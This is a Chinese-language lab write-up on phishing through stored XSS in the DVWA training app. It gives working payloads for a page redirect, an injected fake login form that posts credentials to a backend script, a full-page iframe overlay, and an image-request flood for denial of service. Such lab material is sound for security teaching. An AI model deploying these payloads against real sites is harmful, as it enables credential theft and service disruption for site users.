实验环境:DVWA
实验原理:
钓鱼式攻击是一种企图从电子通讯中,通过伪装成信誉卓著的法人媒体以获得如用户名、密码和信用卡明细等个人敏感信息的犯罪诈骗过程,它常常导引用户到URL与界面外观与真正网站几无二致的假冒网站输入个人数据
实验一:重定向钓鱼,即将当前页面重定向到一个钓鱼页面
举例代码如下:
<script>document.location="http://www.baidu.com"</script>
实验步骤:
1.将js代码写入低级别DVWA中的存储型XSS模块中:
2.点击上传留言板内容,页面将跳转到指定网站
实验二:Html注入式钓鱼,即使用XSS漏洞注入HTML或JavaScript代码到页面中
代码如下:
<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="1.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body><ml>
将代码写入低级别DVWA中的存储型XSS模块中,输入账号密码后即可传到后端:
实验三:iframe钓鱼,即通过<iframe>标签嵌入远程域的一个页面实施钓鱼
代码如下:
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Title</title></head><body><iframe src="http://www.baidu.com" style="position:absolute;top:0;left:0;width:100%;z-index: 999;height:500px"></iframe></body></html>
将代码写入低级别DVWA中的存储型XSS模块中,即可跳转到指定网址:
实验四:DDOS攻击,指的是注入恶意JavaScript代码,可能会引起一些拒绝服务攻击
代码如下:
<script>function imgflood(){var TARGET='localhost';var URL ='/index php?';var pic = new Image();var rand = Math.floor(Math.random()*1000);pic.src ='http://'+TARGET+URL+rand+'=val';}setInterval(imgflood,10);</script>
将代码写入低级别DVWA中的存储型XSS模块中,按F12,点击网络即可看到攻击成功
